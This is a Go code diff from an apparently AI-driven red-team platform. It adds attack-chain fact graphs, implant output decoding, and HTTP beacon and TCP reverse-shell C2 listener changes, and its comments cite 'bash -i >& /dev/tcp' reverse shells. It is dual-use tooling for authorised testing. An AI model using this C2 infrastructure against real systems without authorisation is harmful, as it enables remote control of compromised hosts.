|||||||
@@ -89,6 +89,28 @@ func registerProjectFactTools(mcpServer *mcp.Server, db *database.DB, cfg *confi
|
|||||||
"type": "string",
|
"type": "string",
|
||||||
"description": "可选:关联的漏洞记录 ID",
|
"description": "可选:关联的漏洞记录 ID",
|
||||||
},
|
},
|
||||||
|
"links": map[string]interface{}{
|
||||||
|
"type": "array",
|
||||||
|
"description": "可选:关系边(from → 当前 fact)。finding 至少 1 条 {from:target/*, type:discovered_on};finding 上记录 exploit 用 {from:exploit/*, type:exploits}。省略保留已有边;传 [] 清空全部关系边。",
|
||||||
|
"items": map[string]interface{}{
|
||||||
|
"type": "object",
|
||||||
|
"properties": map[string]interface{}{
|
||||||
|
"from": map[string]interface{}{
|
||||||
|
"type": "string",
|
||||||
|
"description": "来源 fact_key:存储为 from → 当前 fact",
|
||||||
|
},
|
||||||
|
"type": map[string]interface{}{
|
||||||
|
"type": "string",
|
||||||
|
"description": "depends_on | leads_to | enables | exploits | discovered_on | contains | part_of | supports",
|
||||||
|
},
|
||||||
|
"confidence": map[string]interface{}{
|
||||||
|
"type": "string",
|
||||||
|
"description": "confirmed | tentative | deprecated",
|
||||||
|
},
|
||||||
|
},
|
||||||
|
"required": []string{"from", "type"},
|
||||||
|
},
|
||||||
|
},
|
||||||
},
|
},
|
||||||
"required": []string{"fact_key", "summary"},
|
"required": []string{"fact_key", "summary"},
|
||||||
},
|
},
|
||||||
@@ -124,7 +146,26 @@ func registerProjectFactTools(mcpServer *mcp.Server, db *database.DB, cfg *confi
|
|||||||
if err != nil {
|
if err != nil {
|
||||||
return textResult("错误: "+err.Error(), true), nil
|
return textResult("错误: "+err.Error(), true), nil
|
||||||
}
|
}
|
||||||
|
if _, hasLinks := args["links"]; hasLinks {
|
||||||
|
linkInputs, err := project.ParseFactLinkInputs(args["links"])
|
||||||
|
if err != nil {
|
||||||
|
return textResult("错误: "+err.Error(), true), nil
|
||||||
|
}
|
||||||
|
convID := agent.ConversationIDFromContext(ctx)
|
||||||
|
if err := project.PersistFactLinksFromParsed(db, projectID, created.FactKey, convID, linkInputs, true); err != nil {
|
||||||
|
return textResult("错误: 保存关系边失败: "+err.Error(), true), nil
|
||||||
|
}
|
||||||
|
created, _ = db.GetProjectFactByKey(projectID, created.FactKey)
|
||||||
|
} else if parsed := project.ParseLinksFromBody(created.Body); len(parsed) > 0 {
|
||||||
|
if err := project.PersistFactIncomingLinks(db, projectID, created.FactKey, parsed, true); err != nil {
|
||||||
|
return textResult("错误: 从 body 解析边失败: "+err.Error(), true), nil
|
||||||
|
}
|
||||||
|
created, _ = db.GetProjectFactByKey(projectID, created.FactKey)
|
||||||
|
}
|
||||||
msg := fmt.Sprintf("事实已保存。\nfact_key: %s\nid: %s\nconfidence: %s", created.FactKey, created.ID, created.Confidence)
|
msg := fmt.Sprintf("事实已保存。\nfact_key: %s\nid: %s\nconfidence: %s", created.FactKey, created.ID, created.Confidence)
|
||||||
|
if in, _ := db.ListIncomingProjectFactEdges(projectID, created.FactKey); len(in) > 0 {
|
||||||
|
msg += "\n关系边: " + project.FormatFactLinksText(in)
|
||||||
|
}
|
||||||
if warn := project.SparseBodyWarningIfNeeded(f.Category, f.FactKey, f.Body); warn != "" {
|
if warn := project.SparseBodyWarningIfNeeded(f.Category, f.FactKey, f.Body); warn != "" {
|
||||||
msg += warn
|
msg += warn
|
||||||
}
|
}
|
||||||
@@ -164,6 +205,18 @@ func registerProjectFactTools(mcpServer *mcp.Server, db *database.DB, cfg *confi
|
|||||||
if f.SourceConversationID != "" {
|
if f.SourceConversationID != "" {
|
||||||
msg += fmt.Sprintf("\nsource_conversation_id: %s", f.SourceConversationID)
|
msg += fmt.Sprintf("\nsource_conversation_id: %s", f.SourceConversationID)
|
||||||
}
|
}
|
||||||
|
if in, _ := db.ListIncomingProjectFactEdges(projectID, f.FactKey); len(in) > 0 {
|
||||||
|
msg += "\n关系边(from → 本 fact):\n"
|
||||||
|
for _, e := range in {
|
||||||
|
msg += fmt.Sprintf("- %s ← %s (%s)\n", e.EdgeType, e.SourceFactKey, e.Confidence)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if out, _ := db.ListOutgoingProjectFactEdges(projectID, f.FactKey); len(out) > 0 {
|
||||||
|
msg += "指向其他事实:\n"
|
||||||
|
for _, e := range out {
|
||||||
|
msg += fmt.Sprintf("- %s → %s (%s)\n", e.EdgeType, e.TargetFactKey, e.Confidence)
|
||||||
|
}
|
||||||
|
}
|
||||||
msg += "\n\n--- body ---\n" + f.Body
|
msg += "\n\n--- body ---\n" + f.Body
|
||||||
if warn := project.SparseBodyWarningIfNeeded(f.Category, f.FactKey, f.Body); warn != "" {
|
if warn := project.SparseBodyWarningIfNeeded(f.Category, f.FactKey, f.Body); warn != "" {
|
||||||
msg += warn
|
msg += warn
|
||||||
|
|||||||
@@ -293,8 +293,8 @@ func registerListVulnerabilitiesTool(mcpServer *mcp.Server, db *database.DB, log
|
|||||||
},
|
},
|
||||||
"status": map[string]interface{}{
|
"status": map[string]interface{}{
|
||||||
"type": "string",
|
"type": "string",
|
||||||
"description": "按状态筛选:open、confirmed、fixed、false_positive",
|
"description": "按状态筛选:open、confirmed、fixed、false_positive、ignored",
|
||||||
"enum": []string{"open", "confirmed", "fixed", "false_positive"},
|
"enum": []string{"open", "confirmed", "fixed", "false_positive", "ignored"},
|
||||||
},
|
},
|
||||||
"q": map[string]interface{}{
|
"q": map[string]interface{}{
|
||||||
"type": "string",
|
"type": "string",
|
||||||
|
|||||||
@@ -0,0 +1,203 @@
|
|||||||
|
package attackchain
|
||||||
|
|
||||||
|
import (
|
||||||
|
"fmt"
|
||||||
|
"regexp"
|
||||||
|
"strings"
|
||||||
|
|
||||||
|
"cyberstrike-ai/internal/database"
|
||||||
|
"cyberstrike-ai/internal/project"
|
||||||
|
|
||||||
|
"github.com/google/uuid"
|
||||||
|
)
|
||||||
|
|
||||||
|
var promoteSlugSanitizer = regexp.MustCompile(`[^a-z0-9._/-]+`)
|
||||||
|
|
||||||
|
// PromoteToProjectResult 攻击链沉淀结果。
|
||||||
|
type PromoteToProjectResult struct {
|
||||||
|
FactsCreated int `json:"facts_created"`
|
||||||
|
FactsUpdated int `json:"facts_updated"`
|
||||||
|
EdgesCreated int `json:"edges_created"`
|
||||||
|
FactKeys []string `json:"fact_keys"`
|
||||||
|
Graph *database.ProjectFactGraph `json:"graph,omitempty"`
|
||||||
|
}
|
||||||
|
|
||||||
|
// PromoteToProject 将对话攻击链沉淀为项目事实与边。
|
||||||
|
func PromoteToProject(db *database.DB, projectID, conversationID string) (*PromoteToProjectResult, error) {
|
||||||
|
if db == nil {
|
||||||
|
return nil, fmt.Errorf("database 未初始化")
|
||||||
|
}
|
||||||
|
projectID = strings.TrimSpace(projectID)
|
||||||
|
conversationID = strings.TrimSpace(conversationID)
|
||||||
|
if projectID == "" || conversationID == "" {
|
||||||
|
return nil, fmt.Errorf("project_id 与 conversation_id 必填")
|
||||||
|
}
|
||||||
|
if _, err := db.GetProject(projectID); err != nil {
|
||||||
|
return nil, fmt.Errorf("项目不存在")
|
||||||
|
}
|
||||||
|
conv, err := db.GetConversation(conversationID)
|
||||||
|
if err != nil {
|
||||||
|
return nil, fmt.Errorf("对话不存在")
|
||||||
|
}
|
||||||
|
if pid := strings.TrimSpace(conv.ProjectID); pid != "" && pid != projectID {
|
||||||
|
return nil, fmt.Errorf("对话已绑定其他项目")
|
||||||
|
}
|
||||||
|
|
||||||
|
nodes, err := db.LoadAttackChainNodes(conversationID)
|
||||||
|
if err != nil {
|
||||||
|
return nil, err
|
||||||
|
}
|
||||||
|
edges, err := db.LoadAttackChainEdges(conversationID)
|
||||||
|
if err != nil {
|
||||||
|
return nil, err
|
||||||
|
}
|
||||||
|
if len(nodes) == 0 {
|
||||||
|
return nil, fmt.Errorf("该对话尚无攻击链,请先在对话中生成攻击链")
|
||||||
|
}
|
||||||
|
|
||||||
|
res := &PromoteToProjectResult{}
|
||||||
|
nodeToKey := make(map[string]string, len(nodes))
|
||||||
|
usedKeys := map[string]int{}
|
||||||
|
|
||||||
|
for _, node := range nodes {
|
||||||
|
key := allocatePromoteFactKey(node, usedKeys)
|
||||||
|
nodeToKey[node.ID] = key
|
||||||
|
category := mapPromoteNodeCategory(node.Type)
|
||||||
|
existing, getErr := db.GetProjectFactByKey(projectID, key)
|
||||||
|
f := &database.ProjectFact{
|
||||||
|
ProjectID: projectID,
|
||||||
|
FactKey: key,
|
||||||
|
Category: category,
|
||||||
|
Summary: strings.TrimSpace(node.Label),
|
||||||
|
Body: formatPromotedFactBody(node, conversationID),
|
||||||
|
Confidence: "tentative",
|
||||||
|
SourceConversationID: conversationID,
|
||||||
|
}
|
||||||
|
if getErr == nil && existing != nil {
|
||||||
|
f.ID = existing.ID
|
||||||
|
f.CreatedAt = existing.CreatedAt
|
||||||
|
if strings.TrimSpace(f.Summary) == "" {
|
||||||
|
f.Summary = existing.Summary
|
||||||
|
}
|
||||||
|
if _, err := db.UpsertProjectFact(f); err != nil {
|
||||||
|
return nil, err
|
||||||
|
}
|
||||||
|
res.FactsUpdated++
|
||||||
|
} else {
|
||||||
|
if _, err := db.UpsertProjectFact(f); err != nil {
|
||||||
|
return nil, err
|
||||||
|
}
|
||||||
|
res.FactsCreated++
|
||||||
|
}
|
||||||
|
res.FactKeys = append(res.FactKeys, key)
|
||||||
|
}
|
||||||
|
|
||||||
|
for _, edge := range edges {
|
||||||
|
srcKey, ok1 := nodeToKey[edge.Source]
|
||||||
|
tgtKey, ok2 := nodeToKey[edge.Target]
|
||||||
|
if !ok1 || !ok2 || srcKey == tgtKey {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
edgeType := mapPromoteEdgeType(edge.Type)
|
||||||
|
incoming, _ := db.ListIncomingProjectFactEdges(projectID, tgtKey)
|
||||||
|
merged := project.MergeLinkFromInputsUnique(promoteFromEdgeInputsFromDB(incoming), []database.ProjectFactEdgeFromInput{{From: srcKey, Type: edgeType}})
|
||||||
|
if err := db.ReplaceIncomingProjectFactEdges(projectID, tgtKey, merged); err != nil {
|
||||||
|
return nil, err
|
||||||
|
}
|
||||||
|
res.EdgesCreated++
|
||||||
|
if fact, err := db.GetProjectFactByKey(projectID, tgtKey); err == nil {
|
||||||
|
in, _ := db.ListIncomingProjectFactEdges(projectID, tgtKey)
|
||||||
|
fact.Body = project.SyncBodyLinksSection(fact.Body, in)
|
||||||
|
_, _ = db.UpsertProjectFact(fact)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
graph, _ := project.BuildProjectFactGraph(db, projectID, "full", true)
|
||||||
|
res.Graph = graph
|
||||||
|
return res, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
func promoteFromEdgeInputsFromDB(edges []*database.ProjectFactEdge) []database.ProjectFactEdgeFromInput {
|
||||||
|
out := make([]database.ProjectFactEdgeFromInput, 0, len(edges))
|
||||||
|
for _, e := range edges {
|
||||||
|
out = append(out, database.ProjectFactEdgeFromInput{From: e.SourceFactKey, Type: e.EdgeType, Confidence: e.Confidence})
|
||||||
|
}
|
||||||
|
return out
|
||||||
|
}
|
||||||
|
|
||||||
|
func mapPromoteNodeCategory(nodeType string) string {
|
||||||
|
switch strings.ToLower(strings.TrimSpace(nodeType)) {
|
||||||
|
case "target":
|
||||||
|
return project.FactCategoryTarget
|
||||||
|
case "vulnerability":
|
||||||
|
return project.FactCategoryFinding
|
||||||
|
case "action":
|
||||||
|
return project.FactCategoryChain
|
||||||
|
default:
|
||||||
|
return project.FactCategoryNote
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func mapPromoteEdgeType(t string) string {
|
||||||
|
switch strings.ToLower(strings.TrimSpace(t)) {
|
||||||
|
case "discovers", "discovered_on", "targets":
|
||||||
|
return "discovered_on"
|
||||||
|
case "exploits":
|
||||||
|
return "exploits"
|
||||||
|
case "enables":
|
||||||
|
return "enables"
|
||||||
|
case "depends_on":
|
||||||
|
return "depends_on"
|
||||||
|
default:
|
||||||
|
return "leads_to"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func allocatePromoteFactKey(node Node, used map[string]int) string {
|
||||||
|
prefix := "chain/"
|
||||||
|
switch strings.ToLower(strings.TrimSpace(node.Type)) {
|
||||||
|
case "target":
|
||||||
|
prefix = "target/"
|
||||||
|
case "vulnerability":
|
||||||
|
prefix = "finding/"
|
||||||
|
case "action":
|
||||||
|
prefix = "chain/"
|
||||||
|
}
|
||||||
|
base := promoteSlugify(node.Label)
|
||||||
|
if base == "" {
|
||||||
|
base = promoteSlugify(node.ID)
|
||||||
|
}
|
||||||
|
if base == "" {
|
||||||
|
base = uuid.New().String()[:8]
|
||||||
|
}
|
||||||
|
key := prefix + base
|
||||||
|
if n, ok := used[key]; ok {
|
||||||
|
n++
|
||||||
|
used[key] = n
|
||||||
|
key = fmt.Sprintf("%s-%d", key, n)
|
||||||
|
} else {
|
||||||
|
used[key] = 1
|
||||||
|
}
|
||||||
|
return key
|
||||||
|
}
|
||||||
|
|
||||||
|
func promoteSlugify(s string) string {
|
||||||
|
s = strings.ToLower(strings.TrimSpace(s))
|
||||||
|
s = strings.NewReplacer(" ", "-", "—", "-", "–", "-", "/", "-").Replace(s)
|
||||||
|
s = promoteSlugSanitizer.ReplaceAllString(s, "-")
|
||||||
|
s = strings.Trim(s, "-")
|
||||||
|
if len(s) > 64 {
|
||||||
|
s = s[:64]
|
||||||
|
}
|
||||||
|
return s
|
||||||
|
}
|
||||||
|
|
||||||
|
func formatPromotedFactBody(node Node, conversationID string) string {
|
||||||
|
var b strings.Builder
|
||||||
|
b.WriteString("## 来源\n")
|
||||||
|
b.WriteString(fmt.Sprintf("- 对话攻击链沉淀\n- source_conversation_id: %s\n- node_id: %s\n- node_type: %s\n\n", conversationID, node.ID, node.Type))
|
||||||
|
b.WriteString("## 摘要\n")
|
||||||
|
b.WriteString(strings.TrimSpace(node.Label))
|
||||||
|
b.WriteString("\n\n## 关联\n- 结构化关系边(自动同步):\n (见项目攻击路径图)\n")
|
||||||
|
return b.String()
|
||||||
|
}
|
||||||
@@ -0,0 +1,48 @@
|
|||||||
|
package c2
|
||||||
|
|
||||||
|
import (
|
||||||
|
"encoding/base64"
|
||||||
|
"strings"
|
||||||
|
"unicode/utf8"
|
||||||
|
|
||||||
|
"golang.org/x/text/encoding/simplifiedchinese"
|
||||||
|
"golang.org/x/text/transform"
|
||||||
|
)
|
||||||
|
|
||||||
|
// NormalizeConsoleOutput 将 implant/Shell 原始控制台字节转为 UTF-8 文本。
|
||||||
|
// osTag 来自会话的 os 字段(如 windows / Windows 10);空值时按 auto 处理。
|
||||||
|
func NormalizeConsoleOutput(raw []byte, osTag string) string {
|
||||||
|
if len(raw) == 0 {
|
||||||
|
return ""
|
||||||
|
}
|
||||||
|
osTag = strings.ToLower(strings.TrimSpace(osTag))
|
||||||
|
isWindows := strings.Contains(osTag, "windows")
|
||||||
|
|
||||||
|
if utf8.Valid(raw) {
|
||||||
|
return string(raw)
|
||||||
|
}
|
||||||
|
if isWindows {
|
||||||
|
if out, _, err := transform.Bytes(simplifiedchinese.GB18030.NewDecoder(), raw); err == nil {
|
||||||
|
return string(out)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
// 非 Windows 或解码失败:GB18030 兜底(覆盖 GBK)
|
||||||
|
if out, _, err := transform.Bytes(simplifiedchinese.GB18030.NewDecoder(), raw); err == nil {
|
||||||
|
return string(out)
|
||||||
|
}
|
||||||
|
return string(raw)
|
||||||
|
}
|
||||||
|
|
||||||
|
// ResolveTaskResultText 合并 beacon 回传的 Output/OutputB64(及 Error/ErrorB64),按会话 OS 解码。
|
||||||
|
func ResolveTaskResultText(plain, b64, sessionOS string) string {
|
||||||
|
if strings.TrimSpace(b64) != "" {
|
||||||
|
raw, err := base64.StdEncoding.DecodeString(strings.TrimSpace(b64))
|
||||||
|
if err == nil {
|
||||||
|
return NormalizeConsoleOutput(raw, sessionOS)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if plain == "" {
|
||||||
|
return ""
|
||||||
|
}
|
||||||
|
return NormalizeConsoleOutput([]byte(plain), sessionOS)
|
||||||
|
}
|
||||||
@@ -0,0 +1,51 @@
|
|||||||
|
package c2
|
||||||
|
|
||||||
|
import (
|
||||||
|
"encoding/base64"
|
||||||
|
"testing"
|
||||||
|
|
||||||
|
"golang.org/x/text/encoding/simplifiedchinese"
|
||||||
|
"golang.org/x/text/transform"
|
||||||
|
)
|
||||||
|
|
||||||
|
func mustGBK(t *testing.T, s string) []byte {
|
||||||
|
t.Helper()
|
||||||
|
out, _, err := transform.Bytes(simplifiedchinese.GBK.NewEncoder(), []byte(s))
|
||||||
|
if err != nil {
|
||||||
|
t.Fatal(err)
|
||||||
|
}
|
||||||
|
return out
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestNormalizeConsoleOutput_WindowsGBK(t *testing.T) {
|
||||||
|
raw := mustGBK(t, "中文测试")
|
||||||
|
got := NormalizeConsoleOutput(raw, "windows")
|
||||||
|
if got != "中文测试" {
|
||||||
|
t.Fatalf("got %q want 中文测试", got)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestNormalizeConsoleOutput_UTF8Passthrough(t *testing.T) {
|
||||||
|
raw := []byte("hello 世界")
|
||||||
|
got := NormalizeConsoleOutput(raw, "linux")
|
||||||
|
if got != "hello 世界" {
|
||||||
|
t.Fatalf("got %q", got)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestResolveTaskResultText_PrefersB64(t *testing.T) {
|
||||||
|
raw := mustGBK(t, "采购订单")
|
||||||
|
b64 := base64.StdEncoding.EncodeToString(raw)
|
||||||
|
got := ResolveTaskResultText("", b64, "windows")
|
||||||
|
if got != "采购订单" {
|
||||||
|
t.Fatalf("got %q", got)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestResolveTaskResultText_PlainFallback(t *testing.T) {
|
||||||
|
raw := mustGBK(t, "测试")
|
||||||
|
got := ResolveTaskResultText(string(raw), "", "windows")
|
||||||
|
if got != "测试" {
|
||||||
|
t.Fatalf("got %q", got)
|
||||||
|
}
|
||||||
|
}
|
||||||
@@ -367,6 +367,7 @@ func (l *HTTPBeaconListener) handleFileServe(w http.ResponseWriter, r *http.Requ
|
|||||||
}
|
}
|
||||||
prefix := l.cfg.BeaconFilePath
|
prefix := l.cfg.BeaconFilePath
|
||||||
taskID := strings.TrimPrefix(r.URL.Path, prefix)
|
taskID := strings.TrimPrefix(r.URL.Path, prefix)
|
||||||
|
taskID = strings.TrimSuffix(taskID, ".bin")
|
||||||
if taskID == "" || strings.Contains(taskID, "/") || strings.Contains(taskID, "\\") || strings.Contains(taskID, "..") {
|
if taskID == "" || strings.Contains(taskID, "/") || strings.Contains(taskID, "\\") || strings.Contains(taskID, "..") {
|
||||||
l.disguisedReject(w)
|
l.disguisedReject(w)
|
||||||
return
|
return
|
||||||
|
|||||||
@@ -2,10 +2,12 @@ package c2
|
|||||||
|
|
||||||
import (
|
import (
|
||||||
"bytes"
|
"bytes"
|
||||||
|
"encoding/base64"
|
||||||
"encoding/json"
|
"encoding/json"
|
||||||
"io"
|
"io"
|
||||||
"net"
|
"net"
|
||||||
"net/http"
|
"net/http"
|
||||||
|
"os"
|
||||||
"path/filepath"
|
"path/filepath"
|
||||||
"strconv"
|
"strconv"
|
||||||
"strings"
|
"strings"
|
||||||
@@ -127,3 +129,101 @@ func TestHTTPBeaconListener_CheckInMatrix(t *testing.T) {
|
|||||||
}
|
}
|
||||||
})
|
})
|
||||||
}
|
}
|
||||||
|
|
||||||
|
func TestHTTPBeaconListener_HandleFileServe(t *testing.T) {
|
||||||
|
tmp := t.TempDir()
|
||||||
|
dbPath := filepath.Join(tmp, "c2.sqlite")
|
||||||
|
db, err := database.NewDB(dbPath, zap.NewNop())
|
||||||
|
if err != nil {
|
||||||
|
t.Fatal(err)
|
||||||
|
}
|
||||||
|
t.Cleanup(func() { _ = db.Close() })
|
||||||
|
|
||||||
|
lnPick, err := net.Listen("tcp", "127.0.0.1:0")
|
||||||
|
if err != nil {
|
||||||
|
t.Fatal(err)
|
||||||
|
}
|
||||||
|
port := lnPick.Addr().(*net.TCPAddr).Port
|
||||||
|
_ = lnPick.Close()
|
||||||
|
|
||||||
|
keyB64, err := GenerateAESKey()
|
||||||
|
if err != nil {
|
||||||
|
t.Fatal(err)
|
||||||
|
}
|
||||||
|
token := "test-implant-token-file"
|
||||||
|
|
||||||
|
lid := "l_testhttpfile01"
|
||||||
|
rec := &database.C2Listener{
|
||||||
|
ID: lid,
|
||||||
|
Name: "t",
|
||||||
|
Type: string(ListenerTypeHTTPBeacon),
|
||||||
|
BindHost: "127.0.0.1",
|
||||||
|
BindPort: port,
|
||||||
|
EncryptionKey: keyB64,
|
||||||
|
ImplantToken: token,
|
||||||
|
Status: "stopped",
|
||||||
|
ConfigJSON: `{"beacon_file_path":"/file/"}`,
|
||||||
|
CreatedAt: time.Now(),
|
||||||
|
}
|
||||||
|
if err := db.CreateC2Listener(rec); err != nil {
|
||||||
|
t.Fatal(err)
|
||||||
|
}
|
||||||
|
|
||||||
|
store := filepath.Join(tmp, "c2store")
|
||||||
|
m := NewManager(db, zap.NewNop(), store)
|
||||||
|
m.Registry().Register(string(ListenerTypeHTTPBeacon), NewHTTPBeaconListener)
|
||||||
|
if _, err := m.StartListener(lid); err != nil {
|
||||||
|
t.Fatal(err)
|
||||||
|
}
|
||||||
|
t.Cleanup(func() { _ = m.StopListener(lid) })
|
||||||
|
|
||||||
|
fileID := "f_testfile123"
|
||||||
|
downDir := filepath.Join(store, "downstream")
|
||||||
|
if err := os.MkdirAll(downDir, 0o755); err != nil {
|
||||||
|
t.Fatal(err)
|
||||||
|
}
|
||||||
|
want := []byte("upload-payload-bytes")
|
||||||
|
if err := os.WriteFile(filepath.Join(downDir, fileID+".bin"), want, 0o644); err != nil {
|
||||||
|
t.Fatal(err)
|
||||||
|
}
|
||||||
|
|
||||||
|
base := "http://127.0.0.1:" + strconv.Itoa(port)
|
||||||
|
client := &http.Client{Timeout: 5 * time.Second}
|
||||||
|
|
||||||
|
for _, path := range []string{"/file/" + fileID, "/file/" + fileID + ".bin"} {
|
||||||
|
t.Run(path, func(t *testing.T) {
|
||||||
|
req, _ := http.NewRequest(http.MethodGet, base+path, nil)
|
||||||
|
req.Header.Set("X-Implant-Token", token)
|
||||||
|
resp, err := client.Do(req)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatal(err)
|
||||||
|
}
|
||||||
|
defer resp.Body.Close()
|
||||||
|
if resp.StatusCode != http.StatusOK {
|
||||||
|
b, _ := io.ReadAll(resp.Body)
|
||||||
|
t.Fatalf("status=%d body=%q", resp.StatusCode, b)
|
||||||
|
}
|
||||||
|
raw, err := io.ReadAll(resp.Body)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatal(err)
|
||||||
|
}
|
||||||
|
plain, err := DecryptAESGCM(keyB64, string(raw))
|
||||||
|
if err != nil {
|
||||||
|
t.Fatal(err)
|
||||||
|
}
|
||||||
|
var out struct {
|
||||||
|
FileData string `json:"file_data"`
|
||||||
|
}
|
||||||
|
if err := json.Unmarshal(plain, &out); err != nil {
|
||||||
|
t.Fatal(err)
|
||||||
|
}
|
||||||
|
got, err := base64.StdEncoding.DecodeString(out.FileData)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatal(err)
|
||||||
|
}
|
||||||
|
if !bytes.Equal(got, want) {
|
||||||
|
t.Fatalf("got %q want %q", got, want)
|
||||||
|
}
|
||||||
|
})
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|||||||
+59
-11
@@ -20,10 +20,9 @@ import (
|
|||||||
)
|
)
|
||||||
|
|
||||||
// TCPReverseListener 监听 TCP 端口,等待目标机反弹连接。
|
// TCPReverseListener 监听 TCP 端口,等待目标机反弹连接。
|
||||||
// 经典模式:纯交互式 raw shell,与 nc / bash -i >& /dev/tcp 兼容。
|
// 默认仅接受加密 TCP Beacon:连接后先发送魔数 CSB1,再经 AES-GCM 解密且校验 ImplantToken 后才登记会话。
|
||||||
// 二进制 Beacon:连接后先发送魔数 CSB1,随后使用与 HTTP Beacon 相同的 AES-GCM JSON 语义(成帧见 tcp_beacon_server.go)。
|
// 可选经典模式(config.allow_legacy_shell=true):纯交互式 raw shell,与 nc / bash -i >& /dev/tcp 兼容,无鉴权,仅建议内网实验。
|
||||||
// 每个新连接自动生成一个 implant_uuid(基于远端地址 + 启动时间 hash),登记为 c2_session;
|
// 任务派发(经典模式):同步 exec —— 收到 task 时直接 send 命令字节并读取输出(带结束标记)。
|
||||||
// 任务派发:使用同步 exec 模式 —— 收到 task 时直接 send 命令字节并读取输出(带结束标记)。
|
|
||||||
type TCPReverseListener struct {
|
type TCPReverseListener struct {
|
||||||
rec *database.C2Listener
|
rec *database.C2Listener
|
||||||
cfg *ListenerConfig
|
cfg *ListenerConfig
|
||||||
@@ -122,12 +121,14 @@ func (l *TCPReverseListener) acceptLoop() {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
// handleConn 一个连接=一个会话:先识别二进制 TCP Beacon(魔数 CSB1),否则走经典交互式 shell。
|
// handleConn 先识别加密 TCP Beacon(魔数 CSB1 + AES-GCM + Token);未通过则按配置拒绝或走经典 shell。
|
||||||
func (l *TCPReverseListener) handleConn(conn net.Conn) {
|
func (l *TCPReverseListener) handleConn(conn net.Conn) {
|
||||||
br := bufio.NewReader(conn)
|
br := bufio.NewReader(conn)
|
||||||
_ = conn.SetReadDeadline(time.Now().Add(20 * time.Second))
|
remote := conn.RemoteAddr().String()
|
||||||
prefix, err := br.Peek(4)
|
|
||||||
if err == nil && len(prefix) == 4 && string(prefix) == tcpBeaconMagic {
|
_ = conn.SetReadDeadline(time.Now().Add(tcpBeaconPeekTimeout))
|
||||||
|
prefix, peekErr := br.Peek(4)
|
||||||
|
if peekErr == nil && len(prefix) == 4 && string(prefix) == tcpBeaconMagic {
|
||||||
if _, err := br.Discard(4); err != nil {
|
if _, err := br.Discard(4); err != nil {
|
||||||
_ = conn.Close()
|
_ = conn.Close()
|
||||||
return
|
return
|
||||||
@@ -136,14 +137,22 @@ func (l *TCPReverseListener) handleConn(conn net.Conn) {
|
|||||||
l.handleTCPBeaconSession(conn, br)
|
l.handleTCPBeaconSession(conn, br)
|
||||||
return
|
return
|
||||||
}
|
}
|
||||||
|
|
||||||
|
if !l.cfg.AllowLegacyShell {
|
||||||
|
l.logger.Debug("tcp_reverse 拒绝未加密连接", zap.String("remote", remote))
|
||||||
|
_ = conn.Close()
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
_ = conn.SetReadDeadline(time.Time{})
|
_ = conn.SetReadDeadline(time.Time{})
|
||||||
l.handleShellConn(conn, br)
|
l.handleShellConn(conn, br)
|
||||||
}
|
}
|
||||||
|
|
||||||
// handleShellConn 经典裸 TCP 反弹 shell(与 nc/bash /dev/tcp 兼容)。
|
// handleShellConn 经典裸 TCP 反弹 shell(与 nc/bash /dev/tcp 兼容);需监听器显式开启 allow_legacy_shell。
|
||||||
func (l *TCPReverseListener) handleShellConn(conn net.Conn, br *bufio.Reader) {
|
func (l *TCPReverseListener) handleShellConn(conn net.Conn, br *bufio.Reader) {
|
||||||
remote := conn.RemoteAddr().String()
|
remote := conn.RemoteAddr().String()
|
||||||
host, _, _ := net.SplitHostPort(remote)
|
host, _, _ := net.SplitHostPort(remote)
|
||||||
|
|
||||||
// 用 listener+remote_ip 生成稳定 implant_uuid,使同一来源的重连复用同一会话
|
// 用 listener+remote_ip 生成稳定 implant_uuid,使同一来源的重连复用同一会话
|
||||||
uuidSeed := fmt.Sprintf("%s|%s", l.rec.ID, host)
|
uuidSeed := fmt.Sprintf("%s|%s", l.rec.ID, host)
|
||||||
hash := sha256.Sum256([]byte(uuidSeed))
|
hash := sha256.Sum256([]byte(uuidSeed))
|
||||||
@@ -298,6 +307,12 @@ func (l *TCPReverseListener) runTaskOnConn(c *tcpReverseConn, env TaskEnvelope)
|
|||||||
return
|
return
|
||||||
}
|
}
|
||||||
cleaned := cleanShellOutput(output, cmd)
|
cleaned := cleanShellOutput(output, cmd)
|
||||||
|
if TaskType(env.TaskType) == TaskTypeDownload {
|
||||||
|
if errMsg := detectDownloadShellError(cleaned); errMsg != "" {
|
||||||
|
l.reportTaskResult(env.TaskID, startedAt, false, cleaned, errMsg, "", "")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
}
|
||||||
l.reportTaskResult(env.TaskID, startedAt, true, cleaned, "", "", "")
|
l.reportTaskResult(env.TaskID, startedAt, true, cleaned, "", "", "")
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -316,8 +331,8 @@ func (l *TCPReverseListener) reportTaskResult(taskID string, startedAtMS int64,
|
|||||||
}
|
}
|
||||||
|
|
||||||
// buildTCPCommand 把 (TaskType + payload) 转成 raw shell 命令字符串。
|
// buildTCPCommand 把 (TaskType + payload) 转成 raw shell 命令字符串。
|
||||||
// 仅支持 TCP 反弹模式可直接执行的最简任务类型;upload/download/screenshot 这些
|
// 仅支持 TCP 反弹模式可直接执行的最简任务类型;download 通过 base64 输出文本结果,
|
||||||
// 需要二进制传输的能力建议使用 http_beacon。
|
// upload/screenshot 等需要二进制传输的能力建议使用 http_beacon。
|
||||||
func buildTCPCommand(t TaskType, payload map[string]interface{}) (string, bool) {
|
func buildTCPCommand(t TaskType, payload map[string]interface{}) (string, bool) {
|
||||||
switch t {
|
switch t {
|
||||||
case TaskTypeExec, TaskTypeShell:
|
case TaskTypeExec, TaskTypeShell:
|
||||||
